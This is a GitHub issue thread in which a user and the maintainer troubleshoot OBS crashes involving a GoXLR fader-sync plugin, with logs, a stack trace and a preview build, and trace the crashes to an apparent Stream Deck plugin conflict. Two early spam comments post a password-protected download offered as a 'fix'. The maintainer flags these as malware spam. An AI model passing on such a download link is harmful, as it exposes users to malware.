### ISSUE TITLE
[Other]: Possible Streamdeck OBS Plugin incompatibility 

### ISSUE THREAD

**Issue by Bizkep** [parzival-space/obs-goxlr-fader-sync-plugin#16] opened 2024-08-27 05:00 UTC
I have all these plugins installed aside from the FaderSyncPlugin! I have tried one plugin at a time and if I remember correctly since I've done this a couple days ago I believe it's a compatibility issue with Aitum Vertical/Multistream. However I even tried uninstalling Aitum Vertical/Multistream and it happened again so I'm not too sure. It's tough to test though because it's not consistently crashing after a certain time or event happening during stream! Also not sure if it's a FaderSync issue or GoXLR Utility issue but my music and voice chat faders are swapped. I should mention it simply crashes OBS and doesn't give any type of crash log or anything notable that I've seen. Only when I boot up OBS again and try to view standard logs it just says unclean shutdown detected. Could even possible be a streamdeck issue because it crashes sometimes the moment I switch scenes also it seems the fadersync plugin sometimes doesn't work at all the moment I go live and when I got to manually adjust volume in OBS it crashes.

**Operating System**
Windows

**Other installed OBS plugins**
Composite Blur
Aitum Vertical
Aitum Multistream
Source Clone
Source Dock

Disclaimer: This was prior to reinstalling Windows 11 (previously was on Windows 10) and I now only use those plugins mentioned and I've had no issue, I'm sure the moment I install the FaderSync plugin I'll have crashing issues which is super frustrating but I really love this tool. Hopefully this narrows it down in some way.

**Comment by amir1387aht** [comment] 2024-08-27 05:10
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 05:28
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by parzival-space** [comment] 2024-08-27 21:16
Thank you for reporting this. I'm not sure how I am going to fix the problem, as you mentioned yourself that the crashes are extremely irregular.

I'll try to test the plugin with your mentioned plugins, but to be honest, I don't think I'll find anything usefull, given the unpredictable nature of this behavior....


> Also not sure if it's a FaderSync issue or GoXLR Utility issue but my music and voice chat faders are swapped.

This sounds like a issue that you should discuss on the GoXLR Utility / Official Discord.

---

> [!CAUTION]
> Currently, malware spam is being posted in the issues and discussions of various GitHub repositories.  
> Do not download files from links containing the message 【 In the installer menu, select "gcc." 】

**Comment by Bizkep** [comment] 2024-08-28 04:10
[2024-08-27 22-04-26.txt](https://github.com/user-attachments/files/16776219/2024-08-27.22-04-26.txt)
 This is the only thing that happens after the crash

**Comment by parzival-space** [comment] 2024-08-28 14:17
> [2024-08-27 22-04-26.txt](https://github.com/user-attachments/files/16776219/2024-08-27.22-04-26.txt) This is the only thing that happens after the crash

This log indicated that the plugin was not even loaded. Did you send the wrong log file?

<br>

> 00:06:14.575: Number of memory leaks: 26

Also acording to this message you may have an entirely different problem. This could indicate that your OBS is crashing because of a badly written plugin that basically fills your memory until OBS crashes.

**Comment by parzival-space** [comment] 2024-08-28 14:32
If this happens again, could you please provide your newest OBS log **and** your newest crash log? It is currently extremely hard to make any sense of this...

You can use the 'Upload Previous Log File' feature for this after restarting OBS:

![image](https://github.com/user-attachments/assets/ba696c41-902e-40ba-83bf-29ce592c2c29)

**Comment by Bizkep** [comment] 2024-08-28 18:07
Again there's no crashlog that gets created whenever there's a crash which is frustrating! Currently just uninstalled a couple plug-ins now I only have the vertical canvas plugin and source clone plugin! See if I can mitigate the crashing or re-run different plugins to see if one is triggering the crash. I shall also upload previous logs if possible next crash!

**Comment by parzival-space** [comment] 2024-09-02 15:39
We did some testing on the GoXLR-Utility Discord. It's possible that this issue occurs because of the usage of the beta application audio capture. You may be able to fix it by simply deleting the audio source and recreating it.

I also recommend using the asio capture plugin instead of the window capture as it allows directly capturing the internal audio channels of the goxlr.

**Comment by Bizkep** [comment] 2024-09-03 23:38
So I installed the asio capture plugin and then readded the FaderSync plugin but the problem still persists! I genuinely don't know what it could be... maybe my specs? But I don't get these types of issues until I install the dll file! Am I missing a dependency of some kind or something? All I did was download the windows dll file and drop it in the obs plugins 64 folders that's it right?

**Comment by parzival-space** [comment] 2024-09-04 06:23
I totally understand you. Me not being able to reproduce this behavior doesn't make it easier...

If it's ok for you, could you please send me your OBS configuration (profile, plugins...) and all logs (crash- and normal logs if possible) since this issue first happened.
I would like to try to reproduce your exact OBS configuration and see if this reproduces the problem on my end.

**Comment by Bizkep** [comment] 2024-09-04 13:51
Ok so as of now this is what I got!

Link to my Streaming PC Specs! - https://pcpartpicker.com/list/HFM3DZ

Windows 11 Version 23H2
OBS Version 30.2.3
Streamdeck Version 6.7.2
GoXLR Mini Utility Version 1.1.2 with Driver Version 5.57.0

Plug-ins
Aitum Vertical & Multistream
Source Clone
Source Dock
Ashmanix Blur Filter
Asio Input Capture
Websockets (I think that's just built in)

OBS LOGS!
[2024-09-04 09-49-15.txt](https://github.com/user-attachments/files/16871539/2024-09-04.09-49-15.txt)
[2024-09-01 11-42-22.txt](https://github.com/user-attachments/files/16871540/2024-09-01.11-42-22.txt)
[2024-09-01 13-28-14.txt](https://github.com/user-attachments/files/16871541/2024-09-01.13-28-14.txt)
[2024-09-02 15-32-00.txt](https://github.com/user-attachments/files/16871542/2024-09-02.15-32-00.txt)
[2024-09-02 15-47-52.txt](https://github.com/user-attachments/files/16871544/2024-09-02.15-47-52.txt)
[2024-09-02 20-43-38.txt](https://github.com/user-attachments/files/16871545/2024-09-02.20-43-38.txt)
[2024-09-03 15-31-32.txt](https://github.com/user-attachments/files/16871546/2024-09-03.15-31-32.txt)
[2024-09-03 19-45-16.txt](https://github.com/user-attachments/files/16871547/2024-09-03.19-45-16.txt)
[2024-09-04 09-35-03.txt](https://github.com/user-attachments/files/16871548/2024-09-04.09-35-03.txt)
[2024-09-04 09-37-38.txt](https://github.com/user-attachments/files/16871549/2024-09-04.09-37-38.txt)

Crash Logs!
[Crash 2024-09-01 10-34-29.txt](https://github.com/user-attachments/files/16871563/Crash.2024-09-01.10-34-29.txt)

That's all I can think of to add so hopefully this gets you somewhere! Again when OBS crashed when I use the FaderSync Plugin it doesn't showup in the crash reports! As of this very moment when I'm typing the moment I changed scenes on OBS with my streamdeck it crashed but that doesn't always happen the moment I first boot OBS!

**Comment by Bizkep** [comment] 2024-09-04 13:52
I have a couple custom docks with browser sources I use because I multi stream FYI!

**Comment by parzival-space** [comment] 2024-09-04 14:39
could you please provide a zip archive with all your plugin dlls (just so I can verify I have the same) and also please export your scene collection as json  (Scene Collection -> Export).

This is all to allow me to have a 100% copy of your current OBS setup.

**Comment by Bizkep** [comment] 2024-09-04 16:03
How do I submit a zip folder? Max is 25mb but mine is 127mb!

**Comment by Bizkep** [comment] 2024-09-04 16:08
[Bizkep OBS Collection.json](https://github.com/user-attachments/files/16873685/Bizkep.OBS.Collection.json)

**Comment by parzival-space** [comment] 2024-09-04 20:52
Oh, I didn't know about the upload limit. You can use https://send.parzival.space/ or any other filesharing website 🙂

**Comment by Bizkep** [comment] 2024-09-04 22:01
Boom here you go I guess I'm suppose to send here! https://send.parzival.space/download/c82963ad80eb752e/#fD5jTJUq9_M8QLxsn67mwg

**Comment by parzival-space** [comment] 2024-09-05 06:36
Thanks, I will take a look at it this weekend. I am currently on a business trip so I will get to it when I am home again 👍

**Comment by parzival-space** [comment] 2024-09-06 20:48
The fader sync plugin in the zip archive is still version 1.1.0, please update the plugin to the current version https://github.com/parzival-space/obs-goxlr-fader-sync-plugin/releases/latest.  

Maybe this will already fix your problem.
There have been some stability improvements since version 1.1.0.

**Comment by Bizkep** [comment] 2024-09-07 00:36
This has not fixed my problem but thanks I didn't know there was a newer version!

**Comment by parzival-space** [comment] 2024-09-07 08:22
Okay, good to know. How long does it usually take until OBS crashes?

**Comment by Bizkep** [comment] 2024-09-07 15:20
It's usually when I switch scenes but the only consistency is a couple seconds after bootup or after a couple scene switches! Again I use my streamdeck to swap scenes but even manually clicking on scenes it does the same thing!

**Comment by Bizkep** [comment] 2024-09-08 00:20
What's causing my crash is my streamdeck!!! I just fully wiped OBS again and logged into my twitch and installed the fadesyncplugin and it's causing crashing! I'm using the latest version of everything! This is the crash log I got. Once again full clean OBS install and all I did was install the fadersync plugin. That's my cause at least!!!

[Crash 2024-09-07 20-13-11.txt](https://github.com/user-attachments/files/16920215/Crash.2024-09-07.20-13-11.txt)

**Comment by Bizkep** [comment] 2024-09-08 00:22
![d4f994ccbbaf58ce92b0d4372467372e](https://github.com/user-attachments/assets/26cfff8d-4812-461e-9c84-c26bd312091c)

**Comment by parzival-space** [comment] 2024-09-08 00:37
Uh, so the issue is caused by the streamdeck plugin and not by this plugin? So this issue is already known by the streamdeck team? Can I close this isse then?
I am not sure if I completely understand :)

**Comment by Bizkep** [comment] 2024-09-08 01:07
Sorry, I'm saying there's gotta be a conflict with the plugin and streamdeck! I just joined their discord to try and get information about this possibly!

**Comment by parzival-space** [comment] 2024-09-08 10:07
I tried to slow down the updating of audio source volume (before it was with every frame), maybe the streamdeck plugin can't keep up with this.
Now the plugin will only update the channel volume if you actually changed it using a fader.

Could you please test if this preview artifact fixes your problem?
[windows-artifact.zip](https://github.com/parzival-space/obs-goxlr-fader-sync-plugin/actions/runs/10758973926/artifacts/1905810660) ([View pipeline run](https://github.com/parzival-space/obs-goxlr-fader-sync-plugin/actions/runs/10758973926/artifacts/1905810660))

**Comment by Bizkep** [comment] 2024-09-08 10:45
Do I add all these files into the x64 plugin folder?

**Comment by parzival-space** [comment] 2024-09-08 10:47
correct, you only need to add the dll. the other files are debug symbols used for development.

**Comment by Bizkep** [comment] 2024-09-08 10:51
Still the same issue! Have you gotten any other reports of this or am I having a very strange issue?

**Comment by parzival-space** [comment] 2024-09-08 10:53
no, to be honest, you are the only one I know about reporting this issue :(
It is also hard for me to test this since I dont own a streamdeck, so for me its just guesswork

**Comment by Bizkep** [comment] 2024-09-08 10:56
Okay so you're plugin is more than I'm sure at this point however any idea on what I can do to figure out the cause of this issue? Some of the logs pointed to a kernel level driver issue or a faulty thread!

**Comment by parzival-space** [comment] 2024-09-08 11:08
to be honest I am kinda running out of ideas... the last crash log you posted indicated that the crash was caused in streamdeckpluginqt6.dll.

<details>
<summary>Crash Log</summary>

<code>
Thread 48D0: (Crashed)
Stack            EIP              Arg0             Arg1             Arg2             Arg3             Address
00000030B0B94CD0 00007FF95608FABC 0000000000000044 000000000000004F 0000014D09AEA900 0000000000000003 kernelbase.dll!0x7ff95608fabc
00000030B0B94DB0 00007FF93C325267 0000000000000026 0000000000000072 0000000000000003 000000000000001F vcruntime140.dll!0x7ff93c325267
00000030B0B94E10 00007FF8E8FADAB5 0000014D09AEA320 0000000000000001 0000014D09AE9A20 0000000000000002 streamdeckpluginqt6.dll!`dynamic atexit destructor for 'current_locale''+0x25575
00000030B0B94F70 00007FF8E8FAD1E3 0000014D09AE9A20 0000000000000005 0000000000000000 00007FF955F2364B streamdeckpluginqt6.dll!`dynamic atexit destructor for 'current_locale''+0x24ca3
00000030B0B94FE0 00007FF8E8FACEEE 0000014D09AE9480 0000000000000000 0000000000000000 0000000000000002 streamdeckpluginqt6.dll!`dynamic atexit destructor for 'current_locale''+0x249ae
00000030B0B95050 00007FF8E8FACEEE 0000014D09AE93C0 0000000000000002 0000000000000000 0000000000000020 streamdeckpluginqt6.dll!`dynamic atexit destructor for 'current_locale''+0x249ae
00000030B0B950C0 00007FF8E8FACFB0 0000014D09731CF0 00000030B0B95230 00000030B0B95550 0000014D093B2C10 streamdeckpluginqt6.dll!`dynamic atexit destructor for 'current_locale''+0x24a70
00000030B0B95130 00007FF8E8FACB41 00000030B0B95700 00000030B0B95540 00000030B0B95700 0000014D415DDE30 streamdeckpluginqt6.dll!`dynamic atexit destructor for 'current_locale''+0x24601
00000030B0B95480 00007FF8E8FBF90B 00000030B0B95700 00000030B0B95700 00000030B0B956D9 00000030B0B956D9 streamdeckpluginqt6.dll!`dynamic atexit destructor for 'current_locale''+0x373cb
00000030B0B95670 00007FF8E8FEF781 0000014D3D520490 0000000000000000 0000014D08E324A0 0000014D4861FC60 streamdeckpluginqt6.dll!`dynamic atexit destructor for 'current_locale''+0x67241
00000030B0B95740 00007FF94904DDEC 0000014D48613EE0 00007FF949093500 00000030B0B957F0 0000014D00000000 obs.dll!signal_handler_signal+0x12c
00000030B0B957C0 00007FF9490166ED 0000014D08FD5350 00007FF79702C098 0000000000000000 0000014D08FD5350 obs.dll!obs_source_filter_add+0x61d
00000030B0B958F0 00007FF796DA748F 00000030B0B95C40 00007FF8EA398E10 0000000000000000 0000014D096637F0 obs64.exe!OBSBasicFilters::AddNewFilter+0x41f
</code>
</details>

I am not saying that it is not possible that this is caused by my plugin, but to me it seems more likely that the streamdeck plugin is somehow incompatible with my plugin.
And this is something the streamdeck team most likely has to fix.
When my plugin causes a crash, the logs indicate an exception in obs-goxlr-fader-sync.dll.

I really don't want to sound like "Oh no, the problem is not on my side" but that I am not able to reproduce this (and I also don't get more reports of this behavior) makes it really hard for me to troubleshoot this problem.

**Comment by parzival-space** [comment] 2024-09-08 11:10
But, I still have an idea on how I can try to reproduce this. Frosty once mentioned something about an elgato app that could simulate a streamdeck. Maybe I can reproduce the problem with this.

I will give it a try and maybe I can reprocude the problem this way...

**Comment by Bizkep** [comment] 2024-09-08 14:40
Nah I've tried everything you're 100% that your plugin is just fine! I'm gonna last ditch effort this and uninstall all streamdeck stuff and see if the problem persists again!

**Comment by parzival-space** [comment] 2024-09-10 20:32
Closing this issue as discussed in Discord and due to the lack of reproducibility.

Summary:  
It looks like there may be an incompatibility between the Streamdeck OBS plugin and this plugin. @Bizkep was able to fix the OBS crashes by uninstalling the Streamdeck plugin. However, I could not reproduce this problem locally. We have agreed to close the issue for now.

**Closed as not planned by parzival-space** 2024-09-10 20:32 UTC
